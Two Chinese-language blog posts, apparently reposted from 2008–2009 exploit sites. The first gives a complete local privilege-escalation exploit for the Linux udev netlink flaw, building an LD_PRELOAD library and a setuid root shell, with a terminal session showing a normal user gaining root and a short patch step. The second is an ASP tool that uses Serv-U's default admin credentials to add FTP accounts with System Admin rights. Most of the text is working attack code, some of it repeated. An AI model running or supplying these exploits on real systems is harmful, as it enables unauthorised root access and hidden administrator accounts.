普通用户通过udev漏洞提升到root权限
[ 2009/06/25 17:30 | by selboo ]
udev权限提示的漏洞,只要有普通用户权限,即可提升到root权限
udev.sh
演示自己看了
修复漏洞
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.16.el5
[selboo@selboo ~]$ yum update udev
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.20.el5_3
udev.sh
#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
// execl("/tmp/suid", "suid", (void*)0);
}
_EOF
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/stat.h>
void _init()
{
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
// execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
chown("/tmp/suid",0,0);
chmod("/tmp/suid",S_IRUSR|S_IWUSR|S_ISUID|S_IXUSR|S_IROTH|S_IXOTH);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1
# milw0rm.com [2009-04-20]
/tmp/suid
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
// execl("/tmp/suid", "suid", (void*)0);
}
_EOF
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/stat.h>
void _init()
{
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
// execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
chown("/tmp/suid",0,0);
chmod("/tmp/suid",S_IRUSR|S_IWUSR|S_ISUID|S_IXUSR|S_IROTH|S_IXOTH);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1
# milw0rm.com [2009-04-20]
/tmp/suid
演示自己看了
[selboo@selboo ~]$ id
uid=501(selboo) gid=501(selboo) groups=501(selboo)
[selboo@selboo ~]$ ps -ef |grep udev
root 775 1 0 Jun13 ? 00:00:00 /sbin/udevd -d
selboo 762 31582 0 17:05 pts/1 00:00:00 grep udev
[selboo@selboo ~]$ sh udev.sh 774 # 775-1=774
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.2# id
uid=0(root) gid=0(root) groups=501(selboo)
sh-3.2# ls /root/
cnc.txt cnc1.txt installonlyn.py nginx_log.sh rsync.sh whois
sh-3.2#
uid=501(selboo) gid=501(selboo) groups=501(selboo)
[selboo@selboo ~]$ ps -ef |grep udev
root 775 1 0 Jun13 ? 00:00:00 /sbin/udevd -d
selboo 762 31582 0 17:05 pts/1 00:00:00 grep udev
[selboo@selboo ~]$ sh udev.sh 774 # 775-1=774
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.2# id
uid=0(root) gid=0(root) groups=501(selboo)
sh-3.2# ls /root/
cnc.txt cnc1.txt installonlyn.py nginx_log.sh rsync.sh whois
sh-3.2#
修复漏洞
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.16.el5
[selboo@selboo ~]$ yum update udev
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.20.el5_3
Serv-U提权通杀asp脚本(支持SU7)
[ 2008/10/07 11:51 | by selboo ]
文章作者:xiaok[J.L.S.T]
信息来源:安全叶子技术小组[J.Leaves Security Team](http://00day.cn)
一直通杀到su7~~
用来加ftp帐号的......
信息来源:安全叶子技术小组[J.Leaves Security Team](http://00day.cn)
一直通杀到su7~~
用来加ftp帐号的......
<title>Serv-U TOOL</title>
<style type="text/css">
body {
background-color: #333333;
}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {
color: #333333;
border: 1px solid #000000
#;
}
.TextBox {border: 1px solid #084B8E}
body,td,th {
color: #CCCCCC;
}
</style>
<p align="center">Serv-U Local Add User with ASP</p>
<p align="center">Author: Xiao.K</p>
<form name="form1" method="post" action="">
<p align="center">
------------------Serv-U Information------------------
<br>
user:
<input name="duser" type="text" class="TextBox" id="duser" value="LocalAdministrator">
<br>
pwd :
<input name="dpwd" type="text" class="TextBox" id="dpwd" value="#l@$ak#.lk;0@P">
<br>
port:
<input name="dport" type="text" class="TextBox" id="dport" value="43958">
<br>
---------------------Add User!!! ---------------------
<BR>
Domain:
<input name="domain" type="text" class="TextBox" id="domain" value="secdst" />
<br>
FTP USER:
<input name="fuser" type="text" class="TextBox" id="fuser" value="xiaok">
<br>
FTP PASS:
<input name="fpass" type="text" class="TextBox" id="fpass" value="bbs.secdst.net">
<br>
FTP PORT:
<input name="fport" type="text" class="TextBox" id="fport" value="21">
<br>
FTP PATH:
<input name="fpath" type="text" class="TextBox" id="fpath" value="c:\\">
<br>
Privilege
<select para=value name="privilege">
<option value=2>Read-only Admin</option>
<option value=3>Group Admin</option>
<option value=4>Domain Admin</option>
<option value=5>System Admin</option>
</select>
</p>
<p align="center">
<input name="radiobutton" type="radio" value="add" checked class="TextBox">
Add User
<input type="radio" name="radiobutton" value="del" class="TextBox">
Del User </p>
<p align="center">
<input name="Submit" type="submit" class="buttom" value="Run" />
</p>
</form>
<%
user = request.Form("duser")
pass = request.Form("dpwd")
port = request.Form("dport")
domain = request.Form("domain")
fuser = request.Form("fuser")
fpass = request.Form("fpass")
fport = request.Form("fport")
fpath = request.Form("fpath")
privilege=request.Form("privilege")
select case privilege
case 2:
privilege="ReadOnly"
case 3:
privilege="Group"
case 4:
privilege="Domain"
case 5:
privilege="System"
end select
if request.Form("radiobutton") = "add" Then
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=" & domain &"|0.0.0.0|" & fport & "|-1|1|0" & vbCrLf & "-DynDNSEnable=0" & vbCrLf & " DynIPName=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & fport & vbCrLf & "-User="& fuser & vbCrLf & "-Password=" & fpass & vbCrLf & _
"-HomeDir=" & fpath & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
"-Maintenance=" & privilege & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=" & fpath &"|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
'--------
'On Error Resume Next
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "POST", "http://127.0.0.1:"& port &"/secdst",True, "", ""
xPost.Send loginuser & loginpass & mt & newdomain & newuser & quit
Set xPost =nothing
response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&" pass "&fpass&" at port "& fport &"</div>"
elseif request.Form("radiobutton") = "del" Then
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
deluser = "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & port & vbcrlf & " User="& fuser & vbcrlf
quit = "QUIT" & vbCrLf
Set xPost3 = CreateObject("MSXML2.XMLHTTP")
xPost3.Open "POST", "http://127.0.0.1:"& port &"/secdst", True
xPost3.Send loginuser & loginpass & mt & deluser & quit
Set xPOST3=nothing
response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&" pass "&fpass&" at port "& fport &" have deleted</div>"
else
response.write "<div align="&chr(34 )&"center"&chr(34 )&">let's Start!!!</div>"
end if
%>
<style type="text/css">
body {
background-color: #333333;
}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {
color: #333333;
border: 1px solid #000000
#;
}
.TextBox {border: 1px solid #084B8E}
body,td,th {
color: #CCCCCC;
}
</style>
<p align="center">Serv-U Local Add User with ASP</p>
<p align="center">Author: Xiao.K</p>
<form name="form1" method="post" action="">
<p align="center">
------------------Serv-U Information------------------
<br>
user:
<input name="duser" type="text" class="TextBox" id="duser" value="LocalAdministrator">
<br>
pwd :
<input name="dpwd" type="text" class="TextBox" id="dpwd" value="#l@$ak#.lk;0@P">
<br>
port:
<input name="dport" type="text" class="TextBox" id="dport" value="43958">
<br>
---------------------Add User!!! ---------------------
<BR>
Domain:
<input name="domain" type="text" class="TextBox" id="domain" value="secdst" />
<br>
FTP USER:
<input name="fuser" type="text" class="TextBox" id="fuser" value="xiaok">
<br>
FTP PASS:
<input name="fpass" type="text" class="TextBox" id="fpass" value="bbs.secdst.net">
<br>
FTP PORT:
<input name="fport" type="text" class="TextBox" id="fport" value="21">
<br>
FTP PATH:
<input name="fpath" type="text" class="TextBox" id="fpath" value="c:\\">
<br>
Privilege
<select para=value name="privilege">
<option value=2>Read-only Admin</option>
<option value=3>Group Admin</option>
<option value=4>Domain Admin</option>
<option value=5>System Admin</option>
</select>
</p>
<p align="center">
<input name="radiobutton" type="radio" value="add" checked class="TextBox">
Add User
<input type="radio" name="radiobutton" value="del" class="TextBox">
Del User </p>
<p align="center">
<input name="Submit" type="submit" class="buttom" value="Run" />
</p>
</form>
<%
user = request.Form("duser")
pass = request.Form("dpwd")
port = request.Form("dport")
domain = request.Form("domain")
fuser = request.Form("fuser")
fpass = request.Form("fpass")
fport = request.Form("fport")
fpath = request.Form("fpath")
privilege=request.Form("privilege")
select case privilege
case 2:
privilege="ReadOnly"
case 3:
privilege="Group"
case 4:
privilege="Domain"
case 5:
privilege="System"
end select
if request.Form("radiobutton") = "add" Then
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=" & domain &"|0.0.0.0|" & fport & "|-1|1|0" & vbCrLf & "-DynDNSEnable=0" & vbCrLf & " DynIPName=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & fport & vbCrLf & "-User="& fuser & vbCrLf & "-Password=" & fpass & vbCrLf & _
"-HomeDir=" & fpath & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
"-Maintenance=" & privilege & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=" & fpath &"|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
'--------
'On Error Resume Next
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "POST", "http://127.0.0.1:"& port &"/secdst",True, "", ""
xPost.Send loginuser & loginpass & mt & newdomain & newuser & quit
Set xPost =nothing
response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&" pass "&fpass&" at port "& fport &"</div>"
elseif request.Form("radiobutton") = "del" Then
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
deluser = "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & port & vbcrlf & " User="& fuser & vbcrlf
quit = "QUIT" & vbCrLf
Set xPost3 = CreateObject("MSXML2.XMLHTTP")
xPost3.Open "POST", "http://127.0.0.1:"& port &"/secdst", True
xPost3.Send loginuser & loginpass & mt & deluser & quit
Set xPOST3=nothing
response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&" pass "&fpass&" at port "& fport &" have deleted</div>"
else
response.write "<div align="&chr(34 )&"center"&chr(34 )&">let's Start!!!</div>"
end if
%>
